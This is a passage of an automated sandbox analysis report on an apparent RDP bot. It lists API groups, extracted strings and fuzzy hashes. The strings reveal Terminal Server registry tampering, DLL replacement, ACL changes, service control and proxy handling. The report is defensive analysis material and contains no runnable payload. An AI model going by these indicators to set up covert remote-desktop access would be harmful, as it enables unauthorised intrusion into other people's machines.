                                    Similarity
                                    • API ID: HandleModuleSleep
                                    • String ID:
                                    • API String ID: 1071907932-0
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: ServiceStatus
                                    • String ID:
                                    • API String ID: 3969395364-0
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: rand_s
                                    • String ID:
                                    • API String ID: 863162693-0
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: CriticalEnterSection
                                    • String ID:
                                    • API String ID: 1904992153-0
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
                                    • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
                                    • API String ID: 4253334766-1535167640
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLast$bindfflushfwritehtonlhtonslistensetsockoptsocket
                                    • String ID: [E] (%s) -> bind failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> listen failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$tcp_listen
                                    • API String ID: 3590747132-3524496754
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: strlen$strcpy$Local$CriticalErrorFreeLastSection$AllocCopyCreateEnterEntriesFileHandleInfoKnownLeaveModuleNamedSecurityWellfflushfwritestrcat
                                    • String ID: %ProgramFiles%\RDP\$%SystemRoot%\system32\rfxvmt.dll$(uniq_name != NULL)$C:/Projects/rdp/bot/rpd-controller/rdp.c$D$NULL$SetNamedSecurityInfoA done$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateWellKnownSid failed(t=%d,gle=%lu)$[E] (%s) -> Failed(uniq_name=%s,err=%08x)$[E] (%s) -> GetNamedSecurityInfoA failed(dst_dir=%s,res=%lu)$[E] (%s) -> LocalAlloc failed(s=%lu,gle=%lu)$[E] (%s) -> SetEntriesInAclA failed(res=%lu)$[E] (%s) -> SetNamedSecurityInfoA failed(res=%lu)$[I] (%s) -> %s$[I] (%s) -> Done(t=%d,_s=%lu)$[I] (%s) -> Done(uniq_name=%s)$dll$fileset_copy$fs_module_dir$rfxvmt.d$sid_get_well_known_one$termsrv3$v32.dll$v32.ini
                                    • API String ID: 439637577-3231512019
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: strlen$DirectoryErrorLastRemovestrcmpstrcpy$fflushfwrite
                                    • String ID: (path != NULL)$*$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Delete(path_wc=%s,f_path=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_delete
                                    • API String ID: 2460052984-4087913290
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: CriticalHeapSection$AllocCreateEnterErrorLastLeaveProcessThread
                                    • String ID: (handler != NULL)$(host != 0)$(id != 0)$(port != 0)$C:/Projects/rdp/bot/rpd-controller/proxy.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateThread(routine_proxy) failed(gle=%lu)$[E] (%s) -> Failed(id=%llx,host=%08x,port=%d,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> CreateThread(%s) done$[I] (%s) -> Done(id=%llx,host=%08x,port=%d)$[W] (%s) -> Proxy is already open(id=%llx)$mem_alloc$proxy_open$routine_proxy
                                    • API String ID: 2213424947-2249309816
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: Service$ErrorLast$ChangeCloseConfigHandleOpenfflushfwrite
                                    • String ID: $ $((mode == SERVICE_AUTO_START) || (mode == SERVICE_DEMAND_START) || (mode == SERVICE_DISABLED))$(svc != NULL)$C:/Projects/rdp/bot/codebase/scm.c$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ChangeServiceConfigA failed(lpServiceName=%s,mode=%lu,gle=%lu)$[E] (%s) -> OpenServiceA(SERVICE_CHANGE_CONFIG) failed(lpServiceName=%s,gle=%lu)$[I] (%s) -> Done(lpServiceName=%s,mode=%lu)$scm_config_start$~$~
                                    • API String ID: 4203309519-312684847
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: strlen$CreateDirectoryErrorLast$strcpy
                                    • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
                                    • API String ID: 1104438493-1059260517
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: CloseEnumOpen
                                    • String ID: (key != NULL)$(root != NULL)$(subkey != NULL)$(subkey_len != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$[D] (%s) -> Step(root=0x%p,key=%s,enum_index=%lu,subkey=%s,subkey_len=%llu)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegEnumKeyExA failed(root=0x%p,key=%s,enum_index=%lu,subkey_len=%llu,res=%lu)$[E] (%s) -> RegOpenKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_enum_key
                                    • API String ID: 1332880857-2775769510
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastProcess$CloseCodeExitHandle$ObjectSingleTerminateWait
                                    • String ID: (pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(pid=%lu,err=%08x)$[E] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$[E] (%s) -> TerminateProcess failed(pid=%lugle=%lu)$[I] (%s) -> Done(pid=%lu,exit_code=%08lx)$[W] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$process_close
                                    • API String ID: 1879646588-710610406
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmp
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: AttributesErrorFileLast
                                    • String ID: $(attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$P$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu)$c$fs_attr_get$~
                                    Similarity
                                    • API ID: strlen$Openstrcat
                                    • String ID: %Program$=$DP\$Files%\R$PortNumber$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System$SYSTEM\CurrentControlSet\Control\Terminal Server$SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp$SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$dontdisplaylastusername$fDenyTSConnections$fSingleSessionPerUser
                                    Similarity
                                    • API ID: ErrorLastMetricsSystem$fflushfwrite
                                    • String ID: (height != NULL)$(ratio != NULL)$(width != NULL)$C:/Projects/rdp/bot/codebase/sys.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GetSystemMetrics(SM_CXSCREEN) failed(gle=%lu)$[E] (%s) -> GetSystemMetrics(SM_CYSCREEN) failed(gle=%lu)$c$sys_screen_info
                                    Similarity
                                    • API ID: CloseCreate
                                    • String ID: (key != NULL)$(root != NULL)$?$C:/Projects/rdp/bot/codebase/registry.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegCreateKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_create_key
                                    Similarity
                                    • API ID: File$CloseCreateErrorHandleLastTime
                                    • String ID: (ctime != NULL) || (atime != NULL) || (mtime != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_stat
                                    Similarity
                                    • API ID: strlen$EnvironmentExpandStringsstrcpy
                                    • String ID: %ProgramFiles%\RDP\$l$termsrv3$ts32*.dl$v32.ini
                                    Similarity
                                    • API ID: _errno
                                    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
                                    Similarity
                                    • API ID: CriticalHeapSection$EnterFreeLeaveObjectProcessSingleWait
                                    • String ID: [I] (%s) -> Proxy closed(id=%llx)$[W] (%s) -> Proxy not exists(id=%llx)$proxy_close
                                    Similarity
                                    • API ID: Service$Heap$CloseControlErrorFreeHandleLastOpenProcess
                                    • String ID: [E] (%s) -> ControlService(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu)$scm_stop
                                    Similarity
                                    • API ID: Service$Heap$CloseControlErrorFreeHandleLastOpenProcess
                                    • String ID: [E] (%s) -> ControlService(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu)$scm_stop
                                    Similarity
                                    • API ID: Service$Heap$CloseControlErrorFreeHandleLastOpenProcess
                                    • String ID: [E] (%s) -> ControlService(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu)$scm_stop
                                    Similarity
                                    • API ID: Service$Heap$CloseControlErrorFreeHandleLastOpenProcess
                                    • String ID: [E] (%s) -> ControlService(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu)$scm_stop
                                    Similarity
                                    • API ID: AddressProc$HandleLibraryLoadModule
                                    • String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
                                    Similarity
                                    • API ID: CopyErrorFileLastfflushfwrite
                                    • String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
                                    Similarity
                                    • API ID: CriticalHeapSection$EnterFreeLeaveProcessfflushfwrite
                                    • String ID: [D] (%s) -> Requested(handler=0x%p)$[E] (%s) -> Failed(handler=0x%p)$[I] (%s) -> Done(handler=0x%p)$ebus_unsubscribe
                                    Similarity
                                    • API ID: strlen$strcat
                                    • String ID: (file_path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_module_file
                                    • API String ID: 2335785903-2423714266
                                    • Opcode ID: 886c1d0125082086d6236a7ee7ce3a2728db80c2a689adc5134ad21f3790033e
                                    • Instruction ID: b565e1927c06ee7785a30bcb69db859198f49756bceaa12f56d998b69f47d381
                                    • Opcode Fuzzy Hash: 886c1d0125082086d6236a7ee7ce3a2728db80c2a689adc5134ad21f3790033e
                                    • Instruction Fuzzy Hash: 9D116D92B0C6D344FE1A5A35ED257B566A11F13B88F4C4030DE0D8A2A6EEACAC11C242
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: AttributesErrorFileLast
                                    • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                                    • API String ID: 1799206407-4111913120
                                    • Opcode ID: 2c62e7f74456b261eda3a56a5f0472945fabecd707f98314b876e7eb4c98184f
                                    • Instruction ID: 66a6eb33ef6d043d45f5df7ea214acc490402f35332ee6538f97abc7a9d8c4d7
                                    • Opcode Fuzzy Hash: 2c62e7f74456b261eda3a56a5f0472945fabecd707f98314b876e7eb4c98184f
                                    • Instruction Fuzzy Hash: 8B21AFD0F0D6C392FB3A4678DC9437951609F43309FA0053AE11EDE2B9CEADAC859283
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: inet_addr
                                    • String ID: (s != NULL)$(v != NULL)$C:/Projects/rdp/bot/codebase/net.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$ip4_from_str
                                    • API String ID: 1393076350-1216860922
                                    • Opcode ID: 27558201fc945488416f0c09e9fe0ba5faac68ad3d865013deeb4a46647f752f
                                    • Instruction ID: feff7510903685a9b543f8cc81451b4ce1237991095a16359e338ac3cb6e6e73
                                    • Opcode Fuzzy Hash: 27558201fc945488416f0c09e9fe0ba5faac68ad3d865013deeb4a46647f752f
                                    • Instruction Fuzzy Hash: 7711F5E1A0C58782FF129B34EC112F82261AF12308F444235D91D8A1B4EFBCED46E341
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: AddressErrorLastLibraryLoadProc
                                    • String ID: Done$Wow64RevertWow64FsRedirection$[E] (%s) -> Wow64RevertWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_revert$kernel32
                                    • API String ID: 3511525774-1584720945
                                    • Opcode ID: 864cba44ca97bf7edcb33a3b14e650b8a18afea84fbaf8def9057ab66fd9ce8b
                                    • Instruction ID: 1f06611cd136f71b009bcd4f002b9b38cb5e0df23ba6a16a41f44e62d957a670
                                    • Opcode Fuzzy Hash: 864cba44ca97bf7edcb33a3b14e650b8a18afea84fbaf8def9057ab66fd9ce8b
                                    • Instruction Fuzzy Hash: 19114FE0E1D68391FE129B35EC517B422A0AF56744F441035D85EC66B1EEEDBD58C342
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: Service$CloseControlErrorHandleLastOpen
                                    • String ID: [E] (%s) -> ControlService(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu)$scm_stop
                                    • API String ID: 3311966420-638458398
                                    • Opcode ID: 002457e411450f8fa99a83fc6859164a5778e39736ed89b876f985500c632e71
                                    • Instruction ID: 3c50750e534c41b76bc66501e124d7cd55b21e8e8aab818db7c17fdfe43df7cb
                                    • Opcode Fuzzy Hash: 002457e411450f8fa99a83fc6859164a5778e39736ed89b876f985500c632e71
                                    • Instruction Fuzzy Hash: C50135E1B0CA8381FA229B35EC4427952A0BF06B84F845436CA4DCB3B0EEBCAC448301
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: LibraryLoadResource$FindFree
                                    • String ID: (ver != NULL)$C:/Projects/rdp/bot/rpd-controller/rdp.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$rdp_version$termsrv.dll
                                    • API String ID: 3272429154-2519045969
                                    • Opcode ID: ab470ca301d23fdc5eb326f0d7197a22969c08579847cbe546a7a8822d7a6ee9
                                    • Instruction ID: 619184db252f6778adb03f47818c4b233b424fae1833ecee96386c7b18be38e1
                                    • Opcode Fuzzy Hash: ab470ca301d23fdc5eb326f0d7197a22969c08579847cbe546a7a8822d7a6ee9
                                    • Instruction Fuzzy Hash: 6EF0ECD1B0E6CB81FF12EB71EC545B46260AF46744F840135D94D863B1EEACBD4AD305
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: CriticalSection$Heap$CloseDeleteEnterFreeHandleLeaveObjectProcessSingleWait
                                    • String ID: Done$[I] (%s) -> %s$ebus_cleanup
                                    • API String ID: 3198640931-3713968270
                                    • Opcode ID: b85e3b5bd7b285eeaef46b5be38c830201cde683806f94eac2d76a944e22bfa9
                                    • Instruction ID: 87347dba334d2ff8fd28563a08d4b4083bacb1d95ea85d97db840b05674115f3
                                    • Opcode Fuzzy Hash: b85e3b5bd7b285eeaef46b5be38c830201cde683806f94eac2d76a944e22bfa9
                                    • Instruction Fuzzy Hash: F801C2A1A2C9C281FB129B34EC653787260AF56730F504335D8BD862F0DFECAC559342
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: CloseHandle
                                    • String ID: (pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$process_free
                                    • API String ID: 2962429428-1801624891
                                    • Opcode ID: fc10055c64f6071bb9d6228ada1094c04c8fcfc9b41819313f97703f498a23d6
                                    • Instruction ID: 57914b2d00a160dad8e64facc9704dc1ab186fc08564830d329668b4064057dd
                                    • Opcode Fuzzy Hash: fc10055c64f6071bb9d6228ada1094c04c8fcfc9b41819313f97703f498a23d6
                                    • Instruction Fuzzy Hash: 72F0F8E1A5D88B81FE02DB34FC102A42320AB42788F454136D90D872749EACED56C311
                                    APIs
                                    • VirtualProtect.KERNEL32(?,?,?,?,?,00007FFB22745034,?,?,00007FFB227311A1), ref: 00007FFB227405E2
                                    Strings
                                    • Unknown pseudo relocation bit size %d., xrefs: 00007FFB2274050B
                                    • Unknown pseudo relocation protocol version %d., xrefs: 00007FFB22740482
                                    • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FFB2274057D
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                    • API String ID: 544645111-1286557213
                                    • Opcode ID: 9dd09dc7ed375448d2989ebb7bbce778407ab74c03ffeac50a15ff0a8d23e62d
                                    • Instruction ID: 6c9d8df4c1f607ff5a7b324a43f2ceecf067e2ebb30e50c7a218fe0b12b2d849
                                    • Opcode Fuzzy Hash: 9dd09dc7ed375448d2989ebb7bbce778407ab74c03ffeac50a15ff0a8d23e62d
                                    • Instruction Fuzzy Hash: 906159A2F1C69286FE1A8B75DD406B872B0EB47B94F448135DA5C877E5DEBCE980C700
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: CloseHandleService
                                    • String ID: [E] (%s) -> Service stop failed(lpServiceName=%s,pid=%lu,err=%08x)$scm_stop
                                    • API String ID: 1725840886-2743387298
                                    • Opcode ID: 34afd658e9610579becb046621adafd38131ca6ce25e9f297a7b029d37065a75
                                    • Instruction ID: cdfd4b57eea9e4974756ef30b3b34d7412602d8ded0eb53f4788c7ce0ec26b6e
                                    • Opcode Fuzzy Hash: 34afd658e9610579becb046621adafd38131ca6ce25e9f297a7b029d37065a75
                                    • Instruction Fuzzy Hash: 2B013CD2B0C28341FA635A75EC812B951806F53744F88013ADE5DC62B0DEFCAD858202
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: 5fb27d87997a0456c4b3bb2036d8ec720e397794cd357dbc5771efa51323e346
                                    • Instruction ID: 0cc5733757a7c8823209c7b02e60ab691d84418bb60b7e95a5531fb63a51c161
                                    • Opcode Fuzzy Hash: 5fb27d87997a0456c4b3bb2036d8ec720e397794cd357dbc5771efa51323e346
                                    • Instruction Fuzzy Hash: E1F0BEA3F0D28381F9139A24FC517B812512F92770F0905318D5C8A6E1EEFCAC829202
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: 01a02412ab8275c36465b68411a2af4964e092d8c3a43a4fad68f3ebd8b1bdb2
                                    • Instruction ID: 51cafd36d0c0164894aa508aa5adb3db03acce67f79b0cc0cafb3dc0ce09d4ed
                                    • Opcode Fuzzy Hash: 01a02412ab8275c36465b68411a2af4964e092d8c3a43a4fad68f3ebd8b1bdb2
                                    • Instruction Fuzzy Hash: 7FF0BEA3B0D28381F9139A24FC517B812512F92775F0905318D5C8A6E1EEFCAC829202
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: 4870d544d535033029d480653b6722bb726d195aed30ebe31d3fc1a3d62f9b41
                                    • Instruction ID: c7d6fbec5833cde370d4a62ed17c90907a454781013b8645b827509de6b68715
                                    • Opcode Fuzzy Hash: 4870d544d535033029d480653b6722bb726d195aed30ebe31d3fc1a3d62f9b41
                                    • Instruction Fuzzy Hash: A9F0BEA3B0D28381F9139A24FC517B912512F92774F0905318D5C8A6E1EEFCAC829202
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: b31d3a5901d0513704d4fe754bffd3a407be5763b5c741f5472f0051b2e3fa67
                                    • Instruction ID: 58cad8d1a557d7e5dc081512fd3eb9598f11a9f35a92f38aa1bc2f51e7dc6af1
                                    • Opcode Fuzzy Hash: b31d3a5901d0513704d4fe754bffd3a407be5763b5c741f5472f0051b2e3fa67
                                    • Instruction Fuzzy Hash: 3BF0BEA3F0D28381F9139A24FC517B812512F92774F090531CD5C8A6E1EEFCAC829202
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    Similarity
                                    • API ID: CloseHandleService
                                    • String ID: [E] (%s) -> Service start failed(lpServiceName=%s,err=%08x)$scm_start
                                    • API String ID: 1725840886-2678404757
                                    Similarity
                                    • API ID: CloseHandleService
                                    • String ID: [E] (%s) -> Service start failed(lpServiceName=%s,err=%08x)$scm_start
                                    • API String ID: 1725840886-2678404757
                                    Similarity
                                    • API ID: CloseHandleService
                                    • String ID: [E] (%s) -> Service start failed(lpServiceName=%s,err=%08x)$scm_start
                                    • API String ID: 1725840886-2678404757
                                    Similarity
                                    • API ID: CloseHandleService
                                    • String ID: [E] (%s) -> Service start failed(lpServiceName=%s,err=%08x)$scm_start
                                    • API String ID: 1725840886-2678404757
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                    • API String ID: 1001908780-3542721600
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                    • API String ID: 1001908780-3542721600
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                    • API String ID: 1001908780-3542721600
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                    • API String ID: 1001908780-3542721600
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                    • API String ID: 1001908780-3542721600
                                    Similarity
                                    • API ID: Closefflushfwrite
                                    • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                                    • API String ID: 1001908780-1337547089